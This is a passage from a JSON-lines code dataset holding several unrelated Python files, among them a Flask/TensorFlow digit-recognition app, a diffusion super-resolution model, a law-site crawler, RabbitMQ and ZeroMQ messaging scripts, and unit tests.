)\n return value\n\n\ndef convert_percentage( data ):\n if isinstance( data, float ):\n return data\n if isinstance( data, int ):\n return data\n value = data.strip()\n value = value.replace(',', '.')\n value = re.sub(r'\\s+', '', value) ## remove whitespaces\n value = value.replace('%', '')\n try:\n return float(value)\n except ValueError:\n return value\n\n\ndef convert_timestamp_datetime( timestamp ):\n return datetime.datetime.fromtimestamp( timestamp )\n\n\ndef is_numeric( value ):\n if isinstance(value, int):\n return True\n if isinstance(value, float):\n return True\n if isinstance(value, str):\n return value.isnumeric()\n return str(value).isnumeric()\n\n\nclass NumericFilter():\n\n def __eq__(self, other):\n return is_numeric( other )\n\n def 
__contains__(self, item):\n return is_numeric( item )\n\n\ndef filter_numeric( dataFrame, columnName ):\n numeric_filter = NumericFilter()\n return dataFrame[ dataFrame[ columnName ] == numeric_filter ]\n\n\ndef convert_to_float( dataFrame, columnName ):\n apply_on_column( dataFrame, columnName, convert_float )\n return filter_numeric( dataFrame, columnName )\n\n\ndef apply_on_column( dataFrame, columnName, function ):\n dataFrame[ columnName ] = dataFrame[ columnName ].apply( function )\n\n\ndef cleanup_column(dataFrame, colName):\n cleanup_column_str( dataFrame, colName, \" \" )\n cleanup_column_str( dataFrame, colName, \"\\t\" )\n cleanup_column_str( dataFrame, colName, \"\\u00A0\" ) ## non-breaking space\n cleanup_column_str( dataFrame, colName, \"\\xc2\\xa0\" ) ## non-breaking space\n\n\ndef cleanup_column_str(dataFrame, colName, substr):\n val = dataFrame.loc[ dataFrame[ colName ].str.contains( substr ), colName ]\n for index, value in val.items():\n val[ index ] = value.split( substr )[0]\n dataFrame.loc[ dataFrame[ colName ].str.contains( substr ), colName ] = val\n","repo_name":"anetczuk/stock-monitor","sub_path":"src/stockdataaccess/dataaccess/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12287509591","text":"from PIL import Image\nimport tensorflow as tf\nfrom cassandra.cluster import Cluster\nimport time\nfrom flask import Flask,request,redirect, flash\nfrom werkzeug.utils import secure_filename\nimport os\n\nimport logging\nlog = logging.getLogger()\nlog.setLevel('INFO')\nhandler = logging.StreamHandler()\nhandler.setFormatter(logging.Formatter(\"%(asctime)s [%(levelname)s] %(name)s: %(message)s\"))\nlog.addHandler(handler)\n\n\nUPLOAD_FOLDER ='/app' #'/home/hchen/桌面/project'\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'JPG', 'PNG', 'bmp'])\nlocaltime = time.strftime(\"%Y-%m-%d %H:%M:%S\")\nKEYSPACE = \"imagesapce\"\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n\n@app.route('/upload', methods=['POST', 'GET'])\ndef upload():\n if request.method == 'POST':\n f = request.files['file']\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) \n result = useModel(f.filename)\n insertValues(localtime,f.filename,result)\n return \"The number in the picture is {}\".format(result)\n \n \n return '''\n \n \n \n \n Title\n \n \n

    Please upload your picture.\n    <form action='' method='post' enctype='multipart/form-data'>\n    <input type='file' name='file'>\n    <input type='submit' value='Upload'>\n    </form>\n    </body>\n    </html>
    \n \n \n '''\n \ndef imageprepare(file_name):\n \"\"\"\n This function returns the pixel values.\n The input is a png file location.\n \"\"\"\n \n im = Image.open(file_name) \n im = im.convert('L') \n tv = list(im.getdata()) #get pixel values\n\n #normalize pixels to 0 and 1. 0 is pure white, 1 is pure black.\n tva = [ (255-x)*1.0/255.0 for x in tv] \n print(tva)\n return tva\n\n \"\"\"\n This function returns the predicted integer.\n The input is the pixel values from the imageprepare() function.\n \"\"\"\n\n\n\n\n\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape,stddev = 0.1)\n return tf.Variable(initial)\n\ndef bias_variable(shape):\n initial = tf.constant(0.1,shape = shape)\n return tf.Variable(initial)\n\ndef conv2d(x,W):\n return tf.nn.conv2d(x, W, strides = [1,1,1,1], padding = 'SAME')\n\ndef max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\ndef GetData():\n x = tf.placeholder(tf.float32, [None, 784])\n\n y_ = tf.placeholder(tf.float32, [None, 10])\n \n W_conv1 = weight_variable([5, 5, 1, 32])\n b_conv1 = bias_variable([32])\n \n x_image = tf.reshape(x,[-1,28,28,1])\n \n\n h_conv1 = tf.nn.relu(conv2d(x_image,W_conv1) + b_conv1)\n h_pool1 = max_pool_2x2(h_conv1)\n \n W_conv2 = weight_variable([5, 5, 32, 64])\n b_conv2 = bias_variable([64])\n \n h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\n h_pool2 = max_pool_2x2(h_conv2)\n \n W_fc1 = weight_variable([7 * 7 * 64, 1024])\n b_fc1 = bias_variable([1024])\n \n h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])\n h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n \n keep_prob = tf.placeholder(\"float\")\n h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n \n W_fc2 = weight_variable([1024, 10])\n b_fc2 = bias_variable([10])\n \n y_conv=tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\n return y_conv, keep_prob, h_conv2, x, y_\n\ndef useModel(file_name):\n result = imageprepare(file_name)\n y_conv, keep_prob,h_conv2, x, y_ = GetData()\n cross_entropy = -tf.reduce_sum(y_*tf.log(y_conv))\n train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n correct_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n \n saver = tf.train.Saver()\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n saver.restore(sess, \"/app/model.ckpt\") #\"/home/haochen/桌面/BigData/Docker/model.ckpt\")#这里使用了之前保存的模型参数\n #print (\"Model restored.\")\n \n prediction=tf.argmax(y_conv,1)\n predint=prediction.eval(feed_dict={x: [result],keep_prob: 1.0}, session=sess)\n print(h_conv2)\n print('result:')\n print(predint[0])\n return predint[0]\n\ndef insertValues(localtime, filename, result):\n cluster = Cluster(contact_points=['0.0.0.0'],port=9042)\n session = cluster.connect()\n try:\n\n session.execute(\"\"\"\n\n CREATE KEYSPACE %s\n\n WITH replication = { 'class': 'SimpleStrategy', 'replication_factor': '2' }\n\n \"\"\" % KEYSPACE)\n\n\n log.info(\"setting keyspace...\")\n\n session.set_keyspace(KEYSPACE)\n\n\n log.info(\"creating table...\")\n\n session.execute(\"\"\"\n\n CREATE TABLE mytable (\n\n time text,\n\n filename text,\n\n result int,\n\n PRIMARY KEY (time, filename, result)\n\n )\n\n \"\"\") \n session.execute(\"\"\"\n \n INSERT INTO mytable (time,filename,result) \n \n VALUES (%s, %s, %s)\n \n \t \"\"\" ,(localtime,filename,result))\n\n except Exception as e:\n\n log.error(\"Unable to create keyspace\")\n\n log.error(e)\n \n \n \nif __name__ == '__main__':\n 
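# bind to all interfaces (0.0.0.0) so the app is reachable externally, e.g. from outside a container\n    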
app.run(host='0.0.0.0', port=80)\n","repo_name":"Ha0Chen/project","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"70568003025","text":"\"\"\"\nTest utilities.\n\nSince py.test discourages putting __init__.py into test directory (i.e. making tests a package)\none cannot import from anywhere under tests folder. However, some utility classes/methods might be useful\nin multiple test modules (i.e. factoryboy factories, base test classes). So this package is the place to put them.\n\"\"\"\n\nfrom mock import patch\n\nfrom edx_ace import policy\n\n\nclass StubPolicy(policy.Policy):\n def __init__(self, deny_value):\n self.deny_value = frozenset(deny_value)\n\n def check(self, message):\n return policy.PolicyResult(deny=self.deny_value)\n\n\ndef patch_policies(test_case, policies):\n patcher = patch(\n 'edx_ace.policy.policies',\n return_value=policies\n )\n patcher.start()\n test_case.addCleanup(patcher.stop)\n\n\ndef patch_channels(test_case, channels):\n patcher = patch(\n 'edx_ace.delivery.channels',\n return_value={\n c.channel_type: c for c in channels\n }\n )\n patcher.start()\n test_case.addCleanup(patcher.stop)\n","repo_name":"AlaaSwedan/edx","sub_path":"edx/app/edxapp/venvs/edxapp/lib/python2.7/site-packages/edx_ace/test_utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"36656792564","text":"import os\n# project libraries\nfrom loguru import logger as log\n\n\ndef get_dictionaries(directory):\n if not os.path.exists(directory):\n raise Exception('directory:{} not exist'.format(directory))\n log.info(f'dicts directory: {directory}')\n # walk the directory once (top level only)\n root, dirs, files = next(os.walk(directory))\n dictionaries = []\n for filename in files:\n if filename.startswith('dictionary.'):\n log.debug(f'load dictionary: {filename}')\n dictionaries.append(os.path.join(root, filename))\n else:\n log.debug(f'ignore dictionary: {filename}')\n return dictionaries\n","repo_name":"zeroleo12345/radius_server_python","sub_path":"src/child_pyrad/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"}
{"seq_id":"75144531024","text":"import h5py\nimport os\nimport numpy as np\nfrom statsmodels import robust\nthisdir = '/media/jopu/Data/jopu/tools_raw_data/TOCR21PDG00193_xBacGS_RawData/TOCR21PDG00193_1xBacGS/raw_data/DH5a/split/'\n#find all file path of hdf5 file in dir\ndef find_HDF5(folder_dir):\n filepathes = []\n for r, d, f in os.walk(folder_dir):\n for file in f:\n if file.endswith(\".fast5\") :\n filepathes.append(os.path.join(r, file))\n return filepathes\n\ndef split_signal(fast5_data,chunk_size = 3600):\n split_raw = []\n rawpath = 'Raw/Reads/'\n try:\n raw_start = fast5_data['Analyses/RawGenomeCorrected_000/BaseCalled_template/Events'].attrs['read_start_rel_to_raw']\n raw = fast5_data['Raw/Reads/']\n row_end = fast5_data['Analyses/RawGenomeCorrected_000/BaseCalled_template/Events'][-1][2]+fast5_data['Analyses/RawGenomeCorrected_000/BaseCalled_template/Events'][-1][3]\n for name in raw.keys():\n rawpath = rawpath+name\n\n signal = fast5_data[rawpath+'/Signal'][raw_start:]\n\n signal = (signal - np.median(signal)) / np.float64(robust.mad(signal))\n for x in range(0,row_end,chunk_size):\n Chunk = 
signal[()][x:x+chunk_size]\n\n if len(Chunk)==chunk_size:\n split_raw.append(Chunk)\n\n except:\n pass\n\n return split_raw\ndef split_ref(fast5_data,chunk_size = 3600,padded_length = 486):\n #container for chunked reference, single chunk of reference, reference lengths and signal\n ref = []\n ref_row = []\n ref_lengths = []\n Chunks = []\n\n base_dict = {b'A':1,b'T':2,b'C':3,b'G':4}\n end_of_chunk = chunk_size\n\n try:\n rawpath = 'Raw/Reads/'\n raw = fast5_data['Raw/Reads/']\n for name in raw.keys():\n rawpath = rawpath+name\n raw_start = fast5_data['Analyses/RawGenomeCorrected_000/BaseCalled_template/Events'].attrs['read_start_rel_to_raw']\n signal = fast5_data[rawpath+'/Signal'][raw_start:]\n #normalize signal\n signal = (signal - np.median(signal)) / np.float32(robust.mad(signal))\n except:\n pass\n try:\n for row in fast5_data['Analyses/RawGenomeCorrected_000/BaseCalled_template/Events']:\n if row[2] >= end_of_chunk-1:\n #sequences exceeding padded_length will not pass\n ref.append(np.pad(ref_row,(0,padded_length-len(ref_row)),mode='constant',constant_values=5))\n ref_lengths.append(len(ref_row))\n ref_row.clear()\n #print(len(signal[()][end_of_chunk-chunk_size:end_of_chunk]),end_of_chunk,len(signal))\n Chunks.append(signal[()][end_of_chunk-chunk_size:end_of_chunk])\n end_of_chunk += chunk_size\n ref_row.append(base_dict.get(row[4]))\n\n except:\n pass\n #Chunks = np.vstack(Chunks)\n return ref_lengths,ref,Chunks\n\ndef run(folder_dir):\n filepathes = find_HDF5(folder_dir)\n Chunk = []\n Reference = []\n Reference_length = []\n for filepath in filepathes:\n try:\n fast5_data = h5py.File(filepath, 'r')\n except IOError:\n raise IOError('Error opening file. Likely a corrupted file.')\n #filter with guppy basecall mean qscore\n if fast5_data['Analyses/Basecall_1D_000/Summary/basecall_1d_template'].attrs['mean_qscore'] > 14:\n ref_length,ref,signal = split_ref(fast5_data)\n Chunk += signal\n Reference += ref\n Reference_length += ref_length\n print(filepath)\n print(len(Reference_length),len(Reference),len(Chunk))\n np.save(\"Chunk\",Chunk)\n np.save(\"Reference\",Reference)\n np.save(\"Reference_length\",Reference_length)\n\n#print(fast5_data['Analyses/RawGenomeCorrected_000/BaseCalled_template/Events'][()][4])\nrun(thisdir)\n'''\ntry:\n fast5_data = h5py.File(thisdir+\"01b0bfad-73c6-4a28-9975-9c5cc63e38bc.fast5\", 'r')\nexcept IOError:\n raise IOError('Error opening file. 
Likely a corrupted file.')\n\nsplit_ref(fast5_data)\n'''\n","repo_name":"jopusun/CASACAll","sub_path":"train_data.py","file_name":"train_data.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6397646997","text":"from enum import auto\r\nimport logging\r\nfrom collections import OrderedDict\r\nfrom data.util import *\r\nimport torch\r\nimport torch.nn as nn\r\nimport os\r\nimport model.networks as networks\r\nfrom .base_model import BaseModel\r\nimport random\r\nimport data.util as Util\r\nfrom .crop_validation import forward_crop\r\nlogger = logging.getLogger('base')\r\n\r\n\r\nclass DDPM(BaseModel):\r\n def __init__(self, opt):\r\n super(DDPM, self).__init__(opt)\r\n # define network and load pretrained models\r\n self.netG = self.set_device(networks.define_G(opt))\r\n self.schedule_phase = None\r\n self.device = torch.device(\r\n 'cuda')\r\n # set loss and load resume state\r\n self.set_loss()\r\n self.set_new_noise_schedule(\r\n opt['model']['beta_schedule']['train'], schedule_phase='train')\r\n if self.opt['phase'] == 'train':\r\n self.netG.train()\r\n # find the parameters to optimize\r\n if opt['model']['finetune_norm']:\r\n optim_params = []\r\n for k, v in self.netG.named_parameters():\r\n v.requires_grad = False\r\n if k.find('transformer') >= 0:\r\n v.requires_grad = True\r\n v.data.zero_()\r\n optim_params.append(v)\r\n logger.info(\r\n 'Params [{:s}] initialized to 0 and will optimize.'.format(k))\r\n else:\r\n optim_params = list(self.netG.parameters())\r\n\r\n self.optG = torch.optim.Adam(\r\n optim_params, lr=opt['train'][\"optimizer\"][\"lr\"])\r\n self.log_dict = OrderedDict()\r\n self.sub, self.div = torch.FloatTensor([0.5]).view(1, -1, 1, 1), torch.FloatTensor([0.5]).view(1, -1, 1, 1)\r\n self.load_network()\r\n self.print_network()\r\n\r\n def feed_data(self, data):\r\n \r\n\r\n data['inp'] = (data['inp'] -self.sub) / self.div\r\n data['gt'] = (data['gt'] -self.sub) / self.div\r\n p = random.random()\r\n\r\n img_lr, img_hr = data['inp'], data['gt']\r\n w_hr = round(img_lr.shape[-1] + (img_hr.shape[-1] - img_lr.shape[-1]) * p)\r\n img_hr = resize_fn(img_hr, w_hr)\r\n hr_coord, _ = Util.to_pixel_samples(img_hr)\r\n cell = torch.ones_like(hr_coord)\r\n cell[:, 0] *= 2 / img_hr.shape[-2]\r\n cell[:, 1] *= 2 / img_hr.shape[-1]\r\n hr_coord = hr_coord.repeat(img_hr.shape[0], 1, 1)\r\n cell = cell.repeat(img_hr.shape[0], 1, 1)\r\n \r\n data = {\r\n 'inp': img_lr,\r\n 'coord': hr_coord,\r\n 'cell': cell,\r\n 'gt': img_hr,\r\n 'scaler': torch.from_numpy(np.array([p], dtype=np.float32)) } \r\n\r\n self.data = self.set_device(data)\r\n\r\n def optimize_parameters(self, scaler):\r\n self.optG.zero_grad()\r\n\r\n\r\n l_pix = self.netG(self.data)\r\n # need to average in multi-gpu\r\n b, c, h, w = self.data['gt'].shape\r\n l_pix = l_pix.sum()/int(b*c*h*w)\r\n\r\n l_pix.backward()\r\n self.optG.step()\r\n\r\n # set log\r\n self.log_dict['l_pix'] = l_pix.item()\r\n\r\n def test(self, crop=False, continous=False, use_ddim=False):\r\n self.netG.eval()\r\n if crop == False:\r\n with torch.no_grad():\r\n if isinstance(self.netG, nn.parallel.DistributedDataParallel):\r\n self.SR = self.netG.module.super_resolution(\r\n self.data, continous, use_ddim)\r\n else:\r\n self.SR = self.netG.super_resolution(\r\n self.data, continous, use_ddim)\r\n else:\r\n with torch.no_grad():\r\n if isinstance(self.netG, nn.parallel.DistributedDataParallel):\r\n self.SR = forward_crop(\r\n self.data, 
self.netG.module, continous, use_ddim\r\n )\r\n else:\r\n self.SR = forward_crop(\r\n self.data, self.netG, continous, use_ddim\r\n )\r\n self.netG.train()\r\n\r\n def sample(self, batch_size=1, continous=False):\r\n self.netG.eval()\r\n with torch.no_grad():\r\n if isinstance(self.netG, nn.parallel.DistributedDataParallel):\r\n self.SR = self.netG.module.sample(batch_size, continous)\r\n else:\r\n self.SR = self.netG.sample(batch_size, continous)\r\n self.netG.train()\r\n\r\n def set_loss(self):\r\n if isinstance(self.netG, nn.parallel.DistributedDataParallel):\r\n self.netG.module.set_loss(self.device)\r\n else:\r\n self.netG.set_loss(self.device)\r\n\r\n def set_new_noise_schedule(self, schedule_opt, schedule_phase='train'):\r\n if self.schedule_phase is None or self.schedule_phase != schedule_phase:\r\n self.schedule_phase = schedule_phase\r\n if isinstance(self.netG, nn.parallel.DistributedDataParallel):\r\n self.netG.module.set_new_noise_schedule(\r\n schedule_opt, self.device)\r\n else:\r\n self.netG.set_new_noise_schedule(schedule_opt, self.device)\r\n\r\n def get_current_log(self):\r\n return self.log_dict\r\n\r\n def get_current_visuals(self, need_LR=True, sample=False):\r\n out_dict = OrderedDict()\r\n if sample:\r\n out_dict['SAM'] = self.SR.detach().float().cpu()\r\n else:\r\n out_dict['SR'] = self.SR.detach().float().cpu()\r\n out_dict['INF'] = self.data['inp'].detach().float().cpu()\r\n out_dict['HR'] = self.data['gt'].detach().float().cpu()\r\n if need_LR and 'LR' in self.data:\r\n out_dict['LR'] = self.data['inp'].detach().float().cpu()\r\n else:\r\n out_dict['LR'] = out_dict['INF']\r\n return out_dict\r\n\r\n def print_network(self):\r\n s, n = self.get_network_description(self.netG)\r\n if isinstance(self.netG, nn.parallel.DistributedDataParallel):\r\n net_struc_str = '{} - {}'.format(self.netG.__class__.__name__,\r\n self.netG.module.__class__.__name__)\r\n else:\r\n net_struc_str = '{}'.format(self.netG.__class__.__name__)\r\n\r\n logger.info(\r\n 'Network G structure: {}, with parameters: {:,d}'.format(net_struc_str, n))\r\n logger.info(s)\r\n\r\n def save_network(self, epoch, iter_step, best=None):\r\n if best is not None:\r\n gen_path = os.path.join(\r\n self.opt['path']['checkpoint'], 'best_{}_gen.pth'.format(best))\r\n opt_path = os.path.join(\r\n self.opt['path']['checkpoint'], 'best_{}_opt.pth'.format(best))\r\n else:\r\n gen_path = os.path.join(\r\n self.opt['path']['checkpoint'], 'latest_gen.pth'.format(iter_step, epoch))\r\n opt_path = os.path.join(\r\n self.opt['path']['checkpoint'], 'latest_opt.pth'.format(iter_step, epoch))\r\n # gen\r\n network = self.netG\r\n if isinstance(self.netG, nn.parallel.DistributedDataParallel):\r\n network = network.module\r\n state_dict = network.state_dict()\r\n for key, param in state_dict.items():\r\n state_dict[key] = param.cpu()\r\n torch.save(state_dict, gen_path)\r\n # opt\r\n opt_state = {'epoch': epoch, 'iter': iter_step,\r\n 'scheduler': None, 'optimizer': None}\r\n opt_state['optimizer'] = self.optG.state_dict()\r\n torch.save(opt_state, opt_path)\r\n\r\n logger.info(\r\n 'Saved model in [{:s}] ...'.format(gen_path))\r\n\r\n def load_network(self):\r\n load_path = self.opt['path']['resume_state']\r\n if load_path is not None:\r\n logger.info(\r\n 'Loading pretrained model for G [{:s}] ...'.format(load_path))\r\n gen_path = '{}_gen.pth'.format(load_path)\r\n opt_path = '{}_opt.pth'.format(load_path)\r\n if not os.path.isfile(gen_path):\r\n return\r\n # gen\r\n network = self.netG\r\n if isinstance(self.netG, 
nn.parallel.DistributedDataParallel):\r\n network = network.module\r\n network.load_state_dict(torch.load(\r\n gen_path, map_location=torch.device('cpu')), strict=True)\r\n\r\n if self.opt['phase'] == 'train':\r\n # optimizer\r\n opt = torch.load(opt_path, map_location=torch.device('cpu'))\r\n\r\n self.begin_step = opt['iter']\r\n self.begin_epoch = opt['epoch']\r\n","repo_name":"Ree1s/IDM","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8573,"program_lang":"python","lang":"en","doc_type":"code","stars":185,"dataset":"github-code","pt":"48"} +{"seq_id":"6508733236","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [(\"data_finder\", \"0002_campaignsignup\")]\n\n operations = [\n migrations.AddField(\n model_name=\"loggedpostcode\",\n name=\"language\",\n field=models.CharField(max_length=5, blank=True),\n )\n ]\n","repo_name":"DemocracyClub/UK-Polling-Stations","sub_path":"polling_stations/apps/data_finder/migrations/0003_loggedpostcode_language.py","file_name":"0003_loggedpostcode_language.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"73323966867","text":"\"\"\"Initial solution to deep_add exercise\n\n08/21/2018\n\"\"\"\n\n\ndef deep_add(nested_list, start=0):\n stack = [nested_list]\n while stack:\n element = stack.pop()\n try:\n # If the element is iterable, add its children to queue\n for child in element:\n stack.append(child)\n except TypeError:\n # It's not iterable -- add it to the sum\n start += element\n return start\n","repo_name":"yilunchen27/python_morsels_solutions","sub_path":"2018_08_20_deep_add/deep_add.py","file_name":"deep_add.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13903228442","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/2/26 下午3:25\n# @Author : liupan\n# @Site : \n# @File : china_law.py\n# @Software: PyCharm\n\nfrom fake_useragent import UserAgent\nfrom pyspider.libs.base_handler import *\nfrom pyspider.database.mysql.mysql_util import MysqlUtil\n\nstart_url = 'http://www.chinalaw.gov.cn/Department/node_592.html'\n\n\nclass Handler(BaseHandler):\n crawl_config = {\n }\n\n @every(minutes=24 * 60)\n def on_start(self):\n self.crawl(start_url, user_agent=UserAgent().random, callback=self.index_page)\n\n @config(age=10 * 24 * 60 * 60)\n def index_page(self, response):\n menu_title_list = response.doc('.menuTitle > dl > a').items()\n for menu_title in menu_title_list:\n menu_href = menu_title.attr('href')\n json_url = 'http://www.chinalaw.gov.cn/json/' + menu_href[-8:-5] + '_1.json'\n self.crawl(json_url, user_agent=UserAgent().random, callback=self.item_page)\n\n menu_content_list = response.doc('.menuContent > li > a').items()\n for menu_content in menu_content_list:\n menu_content_href = menu_content.attr('href')\n json_url = 'http://www.chinalaw.gov.cn/json/' + menu_content_href[-8:-5] + '_1.json'\n self.crawl(json_url, user_agent=UserAgent().random, callback=self.item_page)\n\n def item_page(self, response):\n # news_list = response.doc('.news_list > ul > li').items()\n # for news in news_list:\n # pub_date = news('dd').text()\n # news_href = news('dt > a').attr('href')\n # news_title = news('dt > a').text()\n # self.crawl(news_href, 
user_agent=UserAgent().random, callback=self.detail_page, save={'pub_date': pub_date, 'title': news_title})\n res_json = response.json\n for json_item in res_json:\n title = json_item.get('listtitle')\n pub_date = json_item.get('releasedate')\n news_href = 'http://www.chinalaw.gov.cn' + json_item.get('infostaticurl')\n self.crawl(news_href, user_agent=UserAgent().random, callback=self.detail_page, save={'pub_date': pub_date, 'title': title})\n\n @config(priority=2)\n def detail_page(self, response):\n content = response.doc('#content > span').html()\n if content:\n ret = {\n \"url\": response.url,\n \"title\": response.save.get('title', ''),\n \"pub_date\": response.save.get('pub_date', ''),\n \"content\": content.strip(),\n \"remark\": 'http://www.chinalaw.gov.cn'\n }\n return ret\n\n def on_result(self, result):\n if result and result['title'] and result['content']:\n sql = MysqlUtil()\n sql.insert('law', **result)\n","repo_name":"silianpan/seal-spider-demo","sub_path":"pkulaw/china_law/china_law.py","file_name":"china_law.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"21350412805","text":"#!/usr/bin/env python\n\nimport pika\nimport sys\n\n# create a blocking connection\nconnection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))\n\nchannel = connection.channel()\n\n#declare the direct_logs exchange\nchannel.exchange_declare(exchange='direct_logs', \n type='direct')\n\n#get a new random named queue from the exchange\nresult=channel.queue_declare(exclusive=True)#make the queue auto-delete when the connection gets closed\nqueue_name = result.method.queue\n\n#get the severities to listen to from the user\nseverities = sys.argv[1:]\nif not severities:\n sys.stderr.write(\"Usage: %s [info] [warning] [error]\\n\" % sys.argv[0])\n sys.exit(1)\n\n#bind the severities to the queue\nfor severity in severities:\n channel.queue_bind(exchange='direct_logs',\n queue=queue_name,\n routing_key=severity)\n\nprint(' [*] Waiting for logs. 
To exit press CTRL+C')\n\n#define the callback\ndef callback(ch, method, properties, body):\n print(\" [x] %r:%r\" % (method.routing_key, body))\n\n#register the callback for the queue\nchannel.basic_consume(callback,\n queue=queue_name,\n no_ack=True)\n\n#start consuming\nchannel.start_consuming()\n","repo_name":"ygpravikumar/rabbitmq","sub_path":"4-recieve_log_direct.py","file_name":"4-recieve_log_direct.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"7931581834","text":"import zmq\nimport os.path\nfrom tornado.web import Application, StaticFileHandler\nfrom tornado.websocket import WebSocketHandler\nfrom zmq.eventloop import ioloop as ZIOLoop\nfrom tornado.ioloop import IOLoop\nfrom zmq.eventloop.zmqstream import ZMQStream\n\n\nZIOLoop.install()\ncontext = zmq.Context()\n\nGraph = None\n\nclass WSHandler(WebSocketHandler):\n def open(self):\n global Graph # globals :(\n sub_sock = context.socket(zmq.SUB)\n sub_sock.connect(\"ipc:///tmp/netnetwork.sock\")\n sub_sock.setsockopt(zmq.SUBSCRIBE, 'gupdates')\n self.sub_stream = ZMQStream(sub_sock)\n self.sub_stream.on_recv(self.on_zmq_recv)\n print('Opened a new websocket')\n if Graph is not None:\n self.write_message(Graph)\n\n def on_zmq_recv(self, msg):\n global Graph\n print(\"Forwarding message to client\")\n self.write_message(msg[1])\n Graph = msg[1]\n\n def on_close(self):\n print(\"Closing ws stream\")\n self.sub_stream.close()\n\n\ndef server():\n \"\"\"\n Function that spins up the tornado webserver.\n We have two routes, /static which goes to our js and html\n and /ws which is the websocket which just streams stuff from\n a zmq socket.\n \"\"\"\n static_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"static\")\n app = Application([\n (r'/ws', WSHandler),\n (r'/(.*)', StaticFileHandler, {\"path\": static_path}),\n ])\n app.listen(8080)\n IOLoop.instance().start()\n","repo_name":"rossdylan/netnetwork","sub_path":"netnetwork/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"27459088012","text":"import unittest\n\nfrom Task import *\nfrom Duty import *\nfrom Piece import *\n\nclass TestDuty(unittest.TestCase):\n\n def test_registerTask(self):\n \n dty = Duty()\n\n taskToAdd = Task(\"TLVHAS-DVS-04\", \"Importer des champs UDs\", \"123456\")\n dt1 = 7.0\n pce = Piece(taskToAdd, '2020-04-22 8:08:03.0', '2020-04-22 8:08:10.0')\n\n dty.addPiece(pce)\n\n self.assertEqual(len(dty.tasksRegistered), 1, \\\n \"Length of task registered in duty should be 1.\") \n self.assertEqual(dty.tasksRegistered[0].completedTime, dt1, \\\n \"Completed time should be equal\")\n \n dt2 = 5.0\n pce2 = Piece(taskToAdd, '2020-04-22 8:08:10.0', '2020-04-22 8:08:15.0')\n dty.addPiece(pce2)\n self.assertEqual(len(dty.tasksRegistered), 1, \\\n \"Length of task registered in duty should be 1.\") \n\n self.assertEqual(dty.tasksRegistered[0].completedTime, (dt1 + dt2))\n \n\n dt3 = 3.0\n taskToAdd2 = Task(\"TLVHAS-DVS-04\", \"Importer des champs UDs\", \"\")\n pce3 = Piece(taskToAdd2, '2020-04-22 8:08:15.0', '2020-04-22 8:08:18.0')\n dty.addPiece(pce3)\n self.assertEqual(len(dty.tasksRegistered), 2)\n\n self.assertEqual(dty.tasksRegistered[1].completedTime, (dt3))\n\n dt4 = 3.0\n taskToAdd3 = Task(\"BRAHA19\", \"Fixer bug\", \"\")\n pce4 = Piece(taskToAdd3, '2020-04-22 8:08:15.0', '2020-04-22 8:08:18.0')\n 
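# a piece for a different task id should create a third registered entry\n 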
